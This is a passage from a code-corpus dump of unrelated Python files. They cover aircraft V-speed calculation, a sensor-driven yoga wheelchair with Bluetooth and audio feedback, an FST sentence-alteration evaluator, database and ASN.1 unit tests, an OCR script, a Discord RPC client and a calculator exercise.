self.to_flaps].ix[self.to_mode].ix[weight]\n # print(s_vspeeds)\n self.v1 = int(s_vspeeds[(self.to_columm * 3 - 3)])\n self.vr = int(s_vspeeds[(self.to_columm * 3 - 2)])\n self.v2 = int(s_vspeeds[(self.to_columm * 3 - 1)])\n\n def find_vfs(self):\n weight = math.ceil(self.weight_kg / 1000) * 1000\n self.vfs = int(self.df_vfs.ix[weight][0])\n\n def find_vac(self):\n weight = math.ceil(self.weight_kg / 1000) * 1000\n vac_col = self.appr_flaps // 2 - 1\n self.vac = int(self.df_vac.ix[weight][vac_col])\n\n def find_vref(self):\n weight = math.ceil(self.weight_kg / 1000) * 1000\n vref_col = self.land_flaps - 5\n if self.icing:\n vref_col += 2\n self.vref = int(self.df_vref.ix[weight][vref_col])\n\n def find_vapp(self):\n # weight = math.ceil(self.weight_kg / 1000) * 1000\n if self.wind_true_heading == 0:\n self.wind_true_heading = 360\n self.rwy_true_heading = self.rwy_mag_heading - self.magvar\n if self.rwy_mag_heading < 0:\n self.rwy_mag_heading += 360\n if self.wind_true_heading <= self.rwy_true_heading + 180:\n angle = abs(self.wind_true_heading - self.rwy_true_heading)\n else:\n angle = self.rwy_true_heading + 360 - self.wind_true_heading\n headwind_component = math.cos(math.radians(angle)) * self.wind_speed\n if self.wind_gusts > self.wind_speed:\n gust_adjustment = self.wind_gusts - self.wind_speed\n else:\n gust_adjustment = 0\n self.vapp = int(math.ceil(min(self.vref + 20, self.vref + 5 +\n gust_adjustment + max(\n 0, headwind_component / 3))))\n\n def input_takeoff(self):\n self.weight_kg = self.input_with_default(self.weight_kg, 'Enter takeoff mass in kg [{:d}]: ')\n self.field_elevation = self.input_with_default(self.field_elevation, 'Enter departure field elevation in ft MSL [{:d}]: ')\n self.to_flaps = self.input_with_default(self.to_flaps, 'Enter takeoff flap setting (1-5) [{:d}]: ')\n self.to_mode = self.input_with_default(self.to_mode, 'Enter takeoff mode (1-2) [TO-{:d}]: TO-')\n self.OAT_C = self.input_with_default(self.OAT_C, 'Outside Air Temperature [{:d} deg. C]: ')\n self.altimeter_inHg = self.input_with_default(self.altimeter_inHg, 'Enter local altimeter setting in inHg [{:0.2f}]: ', input_type='float')\n self.press_alt = std_atm.pressure_alt(self.field_elevation, self.altimeter_inHg)\n\n def input_landing(self):\n self.weight_kg = self.input_with_default(self.weight_kg, 'Enter Landing mass in kg [{:d}]: ')\n # self.field_elevation = self.input_with_default(self.field_elevation, 'Enter departure field elevation in ft MSL [{:d}]: ')\n self.appr_flaps = self.input_with_default(self.appr_flaps, 'Enter approach flaps setting (2 or 4) [{:d}]: ')\n self.land_flaps = self.input_with_default(self.land_flaps, 'Enter landing flaps setting (5 or 6=FULL) [{:d}]: ')\n self.icing = self.input_with_default(self.icing, 'Icing [{}]: ', input_type='bool')\n self.rwy_mag_heading = self.input_with_default(self.rwy_mag_heading, 'Enter runway magnetic heading [{:03}]: ')\n self.magvar = self.input_with_default(self.magvar, 'Enter MAGVAR (+W) [{:d}]: ')\n self.wind_true_heading = self.input_with_default(self.wind_true_heading, 'Enter wind true heading [{:03}]: ')\n self.wind_speed = self.input_with_default(self.wind_speed, 'Enter windspeed [{:d}] kt: ')\n self.wind_gusts = self.input_with_default(self.wind_gusts, 'Enter wind gust magnitude [{:d}]: ')\n\n\n # self.to_flaps = int(input('Enter takeoff flap setting (1-5) [{:d}]: '.format(self.to_flaps)))\n # self.to_mode = int(input('Enter takeoff mode (1-2) [TO-{:d}]: TO-'.format(self.to_mode)))\n # self.OAT_C = int(input('Outside Air Temperature [{:d} deg. C]: '.format(self.OAT_C)))\n # self.altimeter_inHg = int(input('Enter local altimeter setting in inHg [{:0.2f}]: '.format(self.altimeter_inHg)))\n\n # def input_landing(self):\n # self.field_elevation = int(input('Enter departure field elevation in ft MSL [{:d}]: '.format(self.field_elevation)))\n # self.field_elevation = int(input('Enter departure field elevation in ft MSL [{:d}]: '.format(self.field_elevation)))\n # self.field_elevation = int(input('Enter departure field elevation in ft MSL [{:d}]: '.format(self.field_elevation)))\n # self.field_elevation = int(input('Enter departure field elevation in ft MSL [{:d}]: '.format(self.field_elevation)))\n # self.field_elevation = int(input('Enter departure field elevation in ft MSL [{:d}]: '.format(self.field_elevation)))\n # self.field_elevation = int(input('Enter departure field elevation in ft MSL [{:d}]: '.format(self.field_elevation)))\n # self.field_elevation = int(input('Enter departure field elevation in ft MSL [{:d}]: '.format(self.field_elevation)))\n # self.field_elevation = int(input('Enter departure field elevation in ft MSL [{:d}]: '.format(self.field_elevation)))\n # self.field_elevation = int(input('Enter departure field elevation in ft MSL [{:d}]: '.format(self.field_elevation)))\n\n def input_with_default(self, default, prompt, input_type = 'int'):\n str_prompt = prompt.format(default)\n response = input(str_prompt)\n if response is None:\n return default\n elif response == '':\n return default\n else:\n if input_type == 'float':\n return float(response)\n elif input_type == 'str':\n return response\n elif input_type == 'bool':\n return bool(response)\n else:\n return int(response)\n\n\nweight_kg = 28500 # kg\nfield_elevation = 2500 # ft\nto_flaps = 2\nto_mode = 2\nappr_flaps = 2\nland_flaps = 5\nicing = False\naltimeter_inHg = 30.02 # in Hg\nOAT_C = 17 # deg C\naltimeter_inHg= 29.92\nrunway_heading = 53\nwind_true_heading = 90\nwind_speed = 15\nwind_gusts = 40\n\nperformance = Takeoff_Land()\nperformance.input_takeoff()\n\n# load data frames\nperformance.load_df()\n# determine v speed column\nperformance.find_to_col()\n# find v speeds\nperformance.find_vspeed()\n# find vfs\nperformance.find_vfs()\n\nprint()\nprint('Take Off')\nprint('Flaps: {}'.format(performance.to_flaps))\nprint('TO-{}'.format(performance.to_mode))\nprint('OAT: {}'.format(performance.OAT_C))\nprint(\"Pressure Altitude: {:.0f}'\".format(performance.press_alt))\nprint('Weight: {} kg'.format(performance.weight_kg))\nprint('V1: {}'.format(performance.v1))\nprint('Vr: {}'.format(performance.vr))\nprint('V2: {}'.format(performance.v2))\nprint('VFS: {}'.format(performance.vfs))\nprint()\n\nperformance.input_landing()\n# find vfs\nperformance.find_vfs()\n# find vac\nperformance.find_vac()\n# find landing speeds\nperformance.find_vref()\nperformance.find_vapp()\n\n\nprint('Landing')\nprint('Weight: {} kg'.format(performance.weight_kg))\nprint('Landing Flaps: {}'.format(performance.land_flaps))\nprint('Icing: ' + str(performance.icing))\nprint('Runway Heading: {:03}'.format(performance.rwy_mag_heading))\nif performance.wind_gusts > 0:\n gust_string = 'G{}'.format(performance.wind_gusts)\nelse:\n gust_string = ''\nprint('Winds: {:03}/{}'.format(performance.wind_true_heading, performance.wind_speed) + gust_string)\nprint('VFS: {}'.format(performance.vfs))\nprint('VAC: {}'.format(performance.vac))\nprint('VAPP: {}'.format(performance.vapp))\nprint('VREF: {}'.format(performance.vref))\n\n\n# print(performance.press_alt)\n\n\n# def v_speeds(press_alt, OAT, flaps, weight_kg):\n\n# def _to_column(OAT, press_alt, flaps, to_mode)\n\n# return v1, vr, v2\n","sub_path":"performance/e_jet_calc/e_jet.py","file_name":"e_jet.py","file_ext":"py","file_size_in_byte":10316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"68700737","text":"from dotenv import load_dotenv\nimport os\nimport pickle\nimport serial\nimport pygatt\nimport numpy as np\nimport pyaudio\nimport wave\nimport time\n\nfrom dcd.entities.thing import Thing\nfrom dcd.entities.property import PropertyType\n\n# The thing ID and access token\nload_dotenv()\nTHING_ID = os.environ['THING_ID']\nTHING_TOKEN = os.environ['THING_TOKEN']\n\n\n# Where to read the model from\nMODEL_FILE_NAME = \"model.pickle\"\n\n# load classifier\nwith open(\"model.pickle\", 'rb') as file:\n neigh = pickle.load(file)\n\n# classes = [\"Not Sitting\", \"Proper Sitting\", \"Leaning Forward\",\n# \"Leaning Backward\", \"Leaning Left\", \"Leaning Right\"]\n\nclasses = [\"Not Sitting\", \"Proper Sitting\", \"Leg Stretch Right\",\n \"Leg Stretch Left\", \"Twist Right\", \"Twist Left\", \"Forward Bend\"]\n\nLABEL_PROP_NAME = \"Yoga Wheelchair\"\nDATA_PROP_NAME = \"fsrYoga\"\n# Read data from serial port\nser = serial.Serial(\n port=os.environ['SERIAL'],\n baudrate=115200,\n timeout=2)\n\n\n\"\"\"\nFor connecting to the Bluetooth feather\n\"\"\"\nBLUETOOTH_DEVICE_MAC = os.environ['BLUETOOTH_DEVICE_MAC']\n\n# UUID of the GATT characteristic to subscribe\nGATT_CHARACTERISTIC_POSTURE = \"02118833-4455-6677-8899-AABBCCDDEEFF\"\n# Many devices, e.g. Fitbit, use random addressing, this is required to connect.\nADDRESS_TYPE = pygatt.BLEAddressType.random\n# Start a BLE adapter\nbleAdapter = pygatt.GATTToolBackend()\nbleAdapter.start()\n# User the BLE adapter to connect to our device\nmy_device = bleAdapter.connect(BLUETOOTH_DEVICE_MAC, address_type=ADDRESS_TYPE)\n\nprint(\"MY DEVICE: \")\nprint(my_device)\n\ndef timer():\n now = time.localtime(time.time())\n return now[5]\n\ndef discover_characteristic(device):\n for uuid in device.discover_characteristics().keys():\n try:\n print(\"Read UUID\" + str(uuid) + \" \" + str(device.char_read(uuid)))\n except:\n print(\"Something wrong with \" + str(uuid))\n\n\ndef sendByBluetooth(x):\n\n x_Bytes = bytes(x)\n\n my_device.char_write(GATT_CHARACTERISTIC_POSTURE, x_Bytes)\n\n\ndef audioList(x):\n if x is 1:\n play_sound('/home/pi/wheelchair-design-platform/docs/workshops/audios/3_posture_1_right_side.wav', 23)\n elif x is 2:\n play_sound('/home/pi/wheelchair-design-platform/docs/workshops/audios/4_posture_1_left.wav', 26)\n elif x is 3:\n play_sound('/home/pi/wheelchair-design-platform/docs/workshops/audios/5_posture_2_side_1.wav', 20)\n elif x is 4:\n play_sound('/home/pi/wheelchair-design-platform/docs/workshops/audios/6_posture_2_side_2.wav', 26)\n elif x is 5:\n play_sound('/home/pi/wheelchair-design-platform/docs/workshops/audios/7_pose_3_down.wav', 22)\n elif x is 6:\n play_sound('/home/pi/wheelchair-design-platform/docs/workshops/audios/8_back_to_comfortable_position.wav', 7)\n\n # play_sound('/home/pi/wheelchair-design-platform/docs/workshops/audios/9_try_again.wav', 10))\n# If default it will play the last audio\n\nstarttime = time.time()\n\nprevResult = 0\ncounter = 0\nexpectedPos = 1\n\ndef predict(values):\n\n global prevResult\n global counter\n global expectedPos\n\n result = neigh.predict(values)\n\n currentPos = int(result[0])\n\n \"\"\"\n 7. Updates the value of the 'Yoga Wheelchair' property in the DCD Hub\n \"\"\"\n prop_label.update_values([currentPos])\n\n if result == prevResult:\n counter = counter + 1\n prevResult = result\n else:\n counter = 0\n prevResult = result\n\n \"\"\"\n 8. Check if the current posture equals the expected one without\n changing during 100 loop repetitions\n \"\"\"\n if counter >= 100 and currentPos == expectedPos:\n \"\"\"\n 9. Send the required position via Bluetooth to the Feather\n \"\"\"\n sendByBluetooth(result + 1)\n \"\"\"\"\n 10. Play audio, guiding the user to start with the next posture\n \"\"\"\n audioList(currentPos)\n expectedPos += 1\n counter = 0\n\n print(\" \" + str(counter) + \" CURRENT POSITION = \" + str(classes[result[0]]) + \" EXPECTED POSITION = \" + str(classes[expectedPos]))\n\n\nprev_button_value = 0\n\n\ndef serial_to_property_values():\n\n global prev_button_value\n\n line_bytes = ser.readline()\n\n # If the line is not corrupted\n if len(line_bytes) > 20:\n try:\n # Convert the bytes into string\n line = line_bytes.decode('utf-8')\n str_values = line.split(',B,')\n fsrString_values = str_values.pop(0)\n\n button_value = int(str_values.pop(0))\n\n print(\"button_value = \" + str(button_value) + \"prev_button_value = \" + str(prev_button_value))\n\n fsrValues = fsrString_values.split(',')\n\n values = [float(x) for x in fsrValues]\n\n \"\"\"\n 4. Updates the values of the 'fsrYoga' property in the DCD Hub\n \"\"\"\n prop_data.update_values(values)\n\n values = [values]\n\n \"\"\"\n 5. Starts Yoga Session\n \"\"\"\n if button_value == 1 and button_value != prev_button_value:\n print(\"Start the Yoga session\")\n prev_button_value = button_value\n sendByBluetooth([1])\n\n play_sound('/home/pi/wheelchair-design-platform/docs/workshops/audios/1_intro_yoga.wav', 47)\n play_sound('/home/pi/wheelchair-design-platform/docs/workshops/audios/2_intro_postures.wav', 11)\n\n \"\"\"\n 6. Uses the algorithm to predict the current posture of the user\n based on the readings of the 9 FSRs\n \"\"\"\n np.array(values).reshape(1, -1)\n predict(values)\n\n except:\n (\"cant parse \")\n\ndef play_sound(file, duration):\n\n print(\"playing audio\")\n CHUNK = 1024\n\n # Load the WAV file\n wf = wave.open(file, 'rb')\n\n p = pyaudio.PyAudio()\n\n stream = p.open(format=p.get_format_from_width(wf.getsampwidth()),\n channels=wf.getnchannels(),\n rate=wf.getframerate(),\n output=True)\n\n data = wf.readframes(CHUNK)\n\n start_time = time.time()\n play = True\n while data != '' and play:\n stream.write(data)\n data = wf.readframes(CHUNK)\n if time.time()-start_time > duration:\n play = False\n\n stream.stop_stream()\n stream.close()\n\n p.terminate()\n\n\n\"\"\"\n 1. Connects with the Data Centric Design Hub\n\"\"\"\n# Instantiate a thing with its credential\nmy_thing = Thing(thing_id=THING_ID, token=THING_TOKEN)\n\n# Read the details of our Thing from the DCD Hub to get property details\nmy_thing.read()\n\n# Find label and data property by name, create classes if none\nprop_label = my_thing.find_or_create_property(LABEL_PROP_NAME, PropertyType.CLASS)\nif prop_label.classes is None or len(prop_label.classes) == 0:\n prop_label.create_classes(classes)\n\nprop_data = my_thing.find_or_create_property(DATA_PROP_NAME, PropertyType.NINE_DIMENSIONS)\n\n\n\"\"\"\n2. Reads the characteristics defined by the feather\n\"\"\"\ndiscover_characteristic(my_device)\n\n\n\"\"\"\n3. Reads the Serial Port uninterruptedly extracting the value of the 9 FSRs\nand the button in separate variables.\n\"\"\"\nwhile True:\n serial_to_property_values()\n","sub_path":"wheelchair3/3_predict_&_Actuate.py","file_name":"3_predict_&_Actuate.py","file_ext":"py","file_size_in_byte":7228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"649716771","text":"#!/usr/bin/env python3 \n\nimport sys\nimport tokenizer\nimport pywrapfst as fst\nimport math\nimport functools\nimport operator\nimport getopt\nimport random\n\nclass AlterSent:\n def __init__(self, unifname, lmfname, maxtypes=0):\n self.unigrams = []\n with open(unifname, 'r', encoding='utf-8') as fp:\n for line in fp:\n toks = line.split()\n self.unigrams.append((toks[0], float(toks[1])))\n self.unigrams = sorted(self.unigrams, key=lambda t: t[1])\n self.lmfst = fst.Fst.read(lmfname)\n self.maxtypes = maxtypes\n\n def fst_alter_sent(self, words, numalts=5):\n # create new empty FST\n altfst = fst.Fst()\n altfst.add_state()\n \n for idx, word in enumerate(words):\n # add the word to the lattice or if out-of-vocabulary\n if word in self.lmfst.input_symbols():\n word_id = self.lmfst.input_symbols().find(word)\n arc = fst.Arc(word_id, word_id, 0, self.get_state_id(idx+1, altfst))\n altfst.add_arc(self.get_state_id(idx, altfst), arc)\n else:\n word_id = self.lmfst.input_symbols().find(\"\")\n arc = fst.Arc(word_id, word_id, 0, self.get_state_id(idx+1, altfst))\n altfst.add_arc(self.get_state_id(idx, altfst), arc)\n\n # add word alternatives to the lattice\n nearlist = []\n for i in range(1):\n r = random.random()\n altword = ''\n p = 0\n for w, wp in self.unigrams:\n p = p + wp\n if p > r:\n altword = w\n break\n nearlist.append(altword)\n #nearlist = None\n\n # check if there are any neighbors at all\n if nearlist == None:\n continue\n\n # add each neighbor to the lattice\n for widx, w in enumerate(nearlist):\n if w in self.lmfst.input_symbols() and w != word:\n w_id = self.lmfst.input_symbols().find(w)\n arc = fst.Arc(w_id, w_id, 0, self.get_state_id(idx+1, altfst))\n altfst.add_arc(self.get_state_id(idx, altfst), arc)\n\n # mark the final state in the FST\n altfst.set_final(len(words))\n altfst.set_start(0)\n\n # sort lattice prior to rescoring\n altfst.arcsort()\n\n # rescore the lattice using the language model\n scoredfst = fst.compose(self.lmfst, altfst)\n\n # get best paths in the rescored lattice\n bestpaths = fst.shortestpath(scoredfst, nshortest=numalts)\n bestpaths.rmepsilon()\n\n altstrings = {}\n\n # get the strings and weights from the best paths\n for i, path in enumerate(self.paths(bestpaths)):\n path_string = ' '.join((bestpaths.input_symbols().find(arc.ilabel)).decode('utf-8') for arc in path)\n path_weight = functools.reduce(operator.add, (float(arc.weight) for arc in path))\n if not path_string in altstrings:\n altstrings[path_string] = path_weight\n \n # sort strings by weight\n scoredstrings = []\n for sent in altstrings:\n score = altstrings[sent]\n scoredstrings.append((score, sent))\n scoredstrings.sort()\n \n if len(scoredstrings) > numalts:\n scoredstrings = scoredstring[:numalts]\n \n return scoredstrings\n\n # helper function to check if state is in FST and add state if not\n def get_state_id(self, state, f):\n if state in f.states():\n return state\n s = f.add_state()\n return s\n\n # helper function to conduct depth first search on all paths in an FST\n def get_paths(self, state, f, prefix=()):\n if float(f.final(state)) != float('inf'):\n yield prefix\n for arc in f.arcs(state):\n for path in self.get_paths(arc.nextstate, f, prefix+(arc,)):\n yield path\n\n # get list of all paths in FST f\n def paths(self, f):\n return self.get_paths(f.start(), f)\n\ndef main(argv):\n fstfname = ''\n fname = ''\n\n try:\n opts, args = getopt.getopt(argv, \"hu:f:\")\n except getopt.GetoptError:\n print(\"awer.py -u -f \")\n sys.exit(1)\n for opt, arg in opts:\n if opt == '-h':\n print(\"awer.py -u -f \")\n sys.exit()\n elif opt == '-u':\n fname = arg\n elif opt == '-f':\n fstfname = arg\n\n if fname == '' or fstfname == '':\n print(\"awer.py -u -f \")\n sys.exit(1)\n\n lv = AlterSent(fname, fstfname, 50000)\n #print(\"Ready\")\n totalerr = 0\n linecnt = 0\n for line in sys.stdin:\n linecnt += 1\n words = tokenizer.word_tokenize(line)\n lines = lv.fst_alter_sent(words,1)\n toks = lines[0][1].split()\n err = 0\n for i in range(len(words)):\n if words[i] != toks[i]:\n err += 1\n \n if len(words) > 0:\n totalerr += err / len(words)\n if linecnt > 0:\n totalerr = totalerr / linecnt\n print(\"AWER: %.5f\" % totalerr)\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"eval/awer.py","file_name":"awer.py","file_ext":"py","file_size_in_byte":5386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"120925144","text":"import unittest\nfrom .utils import Asn1ToolsBaseTest\nimport asn1tools\n\n\nclass Asn1ToolsCheckConstraintsTest(Asn1ToolsBaseTest):\n\n maxDiff = None\n\n def test_all_codecs(self):\n codecs = [\n 'ber',\n 'der',\n 'gser',\n 'jer',\n 'per',\n 'uper',\n 'xer'\n ]\n\n for codec in codecs:\n foo = asn1tools.compile_string(\n \"Foo DEFINITIONS AUTOMATIC TAGS ::= \"\n \"BEGIN \"\n \"A ::= INTEGER \"\n \"END\",\n codec)\n\n with self.assertRaises(NotImplementedError):\n foo.check_constraints('A', 0)\n\n def test_integer(self):\n foo = asn1tools.compile_string(\n \"Foo DEFINITIONS AUTOMATIC TAGS ::= \"\n \"BEGIN \"\n \"A ::= INTEGER \"\n \"B ::= INTEGER (5..99) \"\n \"C ::= INTEGER (-10..10) \"\n \"D ::= INTEGER (5..99, ...) \"\n \"E ::= INTEGER (1000..1000) \"\n \"F ::= SEQUENCE { \"\n \" a INTEGER (4..4), \"\n \" b INTEGER (40..40), \"\n \" c INTEGER (400..400) \"\n \"} \"\n \"G ::= B (6..7) \"\n \"END\")\n\n # Ok.\n datas = [\n ('A', 32768),\n ('A', 0),\n ('A', -32769),\n ('B', 5),\n ('B', 6),\n ('B', 99),\n ('C', -10),\n ('C', 10),\n ('D', 99),\n ('E', 1000),\n ('F', {'a': 4, 'b': 40, 'c': 400})\n ]\n\n for type_name, decoded in datas:\n with self.assertRaises(NotImplementedError):\n foo.check_constraints(type_name, decoded)\n\n # Not ok.\n datas = [\n ('B', 4, ': 4 does not fulfill 5..99'),\n ('B', 100, ': 100 does not fulfill 5..99'),\n ('C', -11, ': -11 does not fulfill -10..10'),\n ('C', 11, ': 11 does not fulfill -10..10'),\n ('D', 100, ': 100 does not fulfill 5..99'),\n ('E', 0, ': 0 does not fulfill 1000..1000'),\n ('F',\n {'a': 4, 'b': 41, 'c': 400},\n 'b: 41 does not fulfill 40..40')\n ]\n\n for type_name, decoded, message in datas:\n with self.assertRaises(NotImplementedError):\n with self.assertRaises(asn1tools.ConstraintsError) as cm:\n foo.check_constraints(type_name, decoded)\n\n self.assertEqual(str(cm.exception), message)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_check_constraints.py","file_name":"test_check_constraints.py","file_ext":"py","file_size_in_byte":2601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"553033439","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Path hack\nimport os, sys\nsys.path.insert(0, os.path.abspath('..'))\n\nfrom threading import Thread\nimport unittest\nfrom requests_cache.backends.storage.dbdict import DbDict, DbPickleDict\n\nDB_NAME = 'test'\n\n\nclass DbdictTestCase(unittest.TestCase):\n def test_save_to_same_database(self):\n d1 = DbDict(DB_NAME, 'table1')\n d2 = DbDict(DB_NAME, 'table2')\n d3 = DbDict(DB_NAME, 'table3')\n d1[1] = 1\n d2[2] = 2\n d3[3] = 3\n self.assertEqual(list(d1.keys()), [1])\n self.assertEqual(list(d2.keys()), [2])\n self.assertEqual(list(d3.keys()), [3])\n\n def test_bulk_commit(self):\n d = DbDict(DB_NAME, 'table')\n d.clear()\n n = 1000\n with d.bulk_commit():\n for i in range(n):\n d[i] = i\n self.assertEqual(list(d.keys()), list(range(n)))\n\n def test_switch_commit(self):\n d = DbDict(DB_NAME)\n d.clear()\n d[1] = 1\n d = DbDict(DB_NAME)\n self.assertIn(1, d)\n\n d.can_commit = False\n d[2] = 2\n\n d = DbDict(DB_NAME)\n self.assertNotIn(2, d)\n self.assert_(d.can_commit)\n\n def test_str(self):\n d = DbDict(DB_NAME)\n d.clear()\n d[1] = 1\n d[2] = 2\n self.assertEqual(str(d), '{1: 1, 2: 2}')\n\n def test_del(self):\n d = DbDict(DB_NAME)\n d.clear()\n for i in range(5):\n d[i] = i\n del d[0]\n del d[1]\n del d[2]\n self.assertEqual(list(d.keys()), list(range(3, 5)))\n\n with self.assertRaises(KeyError):\n del d[0]\n\n def test_picklable_dict(self):\n d = DbPickleDict(DB_NAME)\n d[1] = ForPickle()\n d = DbPickleDict(DB_NAME)\n self.assertEqual(d[1].a, 1)\n self.assertEqual(d[1].b, 2)\n\n def test_len(self):\n d = DbDict(DB_NAME)\n d.clear()\n n = 5\n for i in range(n):\n d[i] = i\n self.assertEqual(len(d), n)\n\n def test_fast_save(self):\n d1 = DbDict(DB_NAME, fast_save=True)\n d2 = DbDict(DB_NAME, 'data2', fast_save=True)\n d1.clear()\n n = 1000\n for i in range(n):\n d1[i] = i\n d2[i * 2] = i\n # HACK if we will not sort, fast save can produce different order of records\n self.assertEqual(sorted(d1.keys()), list(range(n)))\n self.assertEqual(sorted(d2.values()), list(range(n)))\n\n def test_usage_with_threads(self):\n\n def do_test_for(d, n_threads=5):\n d.clear()\n fails = []\n def do_inserts(values):\n try:\n for v in values:\n d[v] = v\n except Exception:\n fails.append(1)\n raise\n\n def values(x, n):\n return [i * x for i in range(n)]\n\n threads = [Thread(target=do_inserts, args=(values(i, n_threads),))\n for i in range(n_threads)]\n for t in threads:\n t.start()\n for t in threads:\n t.join()\n\n self.assert_(not fails)\n for i in range(n_threads):\n for x in values(i, n_threads):\n self.assertEqual(d[x], x)\n\n do_test_for(DbDict(DB_NAME, fast_save=True), 20)\n do_test_for(DbPickleDict(DB_NAME, fast_save=True), 10)\n d1 = DbDict(DB_NAME, fast_save=True)\n d2 = DbDict(DB_NAME, 'table123', fast_save=True)\n do_test_for(d1)\n do_test_for(d2)\n do_test_for(DbDict(DB_NAME))\n\n\nclass ForPickle(object):\n a = 1\n b = 2\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_dbdict.py","file_name":"test_dbdict.py","file_ext":"py","file_size_in_byte":3703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"392399008","text":"def get_cursor_from_index(self, index):\n 'Return the (row, col) of the cursor from text index.\\n '\n index = boundary(index, 0, len(self.text))\n if (index <= 0):\n return (0, 0)\n lf = self._lines_flags\n l = self._lines\n i = 0\n for row in range(len(l)):\n ni = (i + len(l[row]))\n if (lf[row] & FL_IS_LINEBREAK):\n ni += 1\n i += 1\n if (ni >= index):\n return ((index - i), row)\n i = ni\n return (index, row)","sub_path":"Data Set/bug-fixing-5/efc9bcc42ebcb61d169ed902508a3abbf062ccb9--bug.py","file_name":"efc9bcc42ebcb61d169ed902508a3abbf062ccb9--bug.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"394503538","text":"import pytesseract\nfrom PIL import Image\nimport cv2\nimport numpy as np\nimport pickle\n\nimg = cv2.imread('video_stuff/time_stamps/000000.png')\n\nthresh_value = 230\n\nnew_width = 300\ndiff_x = 50\ndiff_y = 30\nnew_height = 90\nimg_width = 206\nimg_height = 31\n\nocr_prepare = np.zeros((new_height, new_width, 3))\n\n\nvideo_location = '../../scenarios/videos_0905/gilles_video.mp4'\n\nframe_location = 'D:/test/'\n\ncap = cv2.VideoCapture(video_location)\n\nocr_results = []\n\ni = 0\nf = open('results.txt', 'w')\nwhile cap.isOpened():\n ret, frame = cap.read()\n if ret == False:\n break\n if i % 100 == 0:\n print(\"============================\")\n time = frame[0:190, 870:1280]\n # r = time[:, :, 0]\n # g = time[:, :, 1]\n # b = time[:, :, 2]\n # indices = np.logical_and(np.logical_and(r > thresh_value, g > thresh_value), b > thresh_value).astype(np.uint8) * 255\n # ocr_prepare[diff_y:diff_y + img_height, diff_x:diff_x + img_width] += time\n # cv2.imshow('image', ocr_prepare)\n # cv2.waitKey(0)\n result = pytesseract.image_to_string(time)\n print(f'{i}: {result}')\n f.write(result + '\\n')\n\n i+=1\n\nf.close()\n\ncap.release()\ncv2.destroyAllWindows()","sub_path":"server/scripts/test_tess.py","file_name":"test_tess.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"377804362","text":"import socket\nimport os\nimport json\nimport struct\n\nclass DiscordRPC:\n def __init__(self):\n self.discordSocket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n\n socketDir = None\n envVars = [\"XDG_RUNTIME_DIR\", \"TMPDIR\", \"TMP\", \"TEMP\"]\n for var in envVars:\n if not var == None:\n socketDir = os.environ.get(var)\n break\n if socketDir == None:\n socketDir = \"/tmp\"\n\n # can be discord-ipc-[0-9]\n for pipeNum in range(0, 10):\n try:\n self.discordSocket.connect(f\"{socketDir}/discord-ipc-{pipeNum}\")\n break\n except socket.error as e:\n # throw exception if all possibilities are exhausted with no success\n if pipeNum == 9:\n raise e\n\n def read(self):\n data = self.discordSocket.recv(4096)\n # fix character encoding errors\n return data.decode(\"utf-8\", errors=\"ignore\")\n\n def write(self, opcode, payload):\n payload = json.dumps(payload)\n # frame structure shown in RpcConnection::Open(), rpc_connection.cpp, reference implementation\n self.discordSocket.send(struct.pack(\"ii\", opcode, len(payload)) + payload.encode(\"utf-8\"))\n \n def init(self, client_id):\n self.write(0, {\"v\": 1, \"client_id\": client_id})\n\n def sendRichPresence(self, pid, activity):\n payload = {\n \"cmd\": \"SET_ACTIVITY\",\n \"args\": {\n \"pid\": pid,\n \"activity\": activity\n },\n \"nonce\": str(os.urandom(16))\n }\n self.write(1, payload)\n \n def close(self):\n self.discordSocket.close()\n","sub_path":"venv/Lib/site-packages/discordrpc/rpc.py","file_name":"rpc.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"198536421","text":"# Basic Calculator II\n# \n# Implement a basic calculator to evaluate a simple expression string.\n# \n# The expression string contains only non-negative integers, +, -, *, / operators and empty spaces . The integer division should truncate toward zero.\n# \n# You may assume that the given expression is always valid.\n# \n# Some examples:\n# \"3+2*2\" = 7\n# \" 3/2 \" = 1\n# \" 3+5 / 2 \" = 5\n# Note: Do not use the eval built-in library function.\n\n# Solution:\n# - Use two stack to track bracket and expressions. \n# \n\nclass Solution:\n # @param {string} s\n # @return {integer}\n def calculate(self, s):\n def evaluate(tokens):\n if len(tokens) == 1:\n return tokens[0]\n if len(tokens) == 3:\n a, b, c = tokens\n result = simple(a,b,c)\n if isinstance(result, int):\n return result\n else:\n return None\n\n stack = []\n brackets = []\n for tok in tokens:\n if tok == '(':\n brackets.append(len(stack))\n stack.append(tok)\n elif tok == ')':\n # A bracket is closed, directly evaluate it. \n last_open = brackets.pop()\n expression = stack[last_open+1:]\n stack = stack[:last_open] + [evaluate(expression)]\n elif type(tok) == type(1):\n if len(stack) > 1 and isinstance(stack[-2], int) and stack[-1] == '*':\n # Process right away, since left operand is already digit\n stack.pop()\n multiplier = stack.pop()\n stack.append(multiplier * tok)\n elif len(stack) > 1 and isinstance(stack[-2], int) and stack[-1] == '/':\n # Process right away, since left operand is already a digit\n stack.pop()\n numerator = stack.pop()\n stack.append(numerator // tok)\n else:\n stack.append(tok)\n elif tok in '+-':\n # All closed bracket should already been processed in the stack\n # All multiply or divide on the left are already calculated \n # Therefore our concern about do plus/minus calculation is \"Whether there's a multiply/divide on the right\"\n # So here, we do the plus/minus calculation if we found a +/- on the right. \n if len(stack) > 2:\n a, b, c = stack[-3:]\n result = simple(a, b, c)\n if result != None:\n stack = stack[:-3] + [result, tok]\n 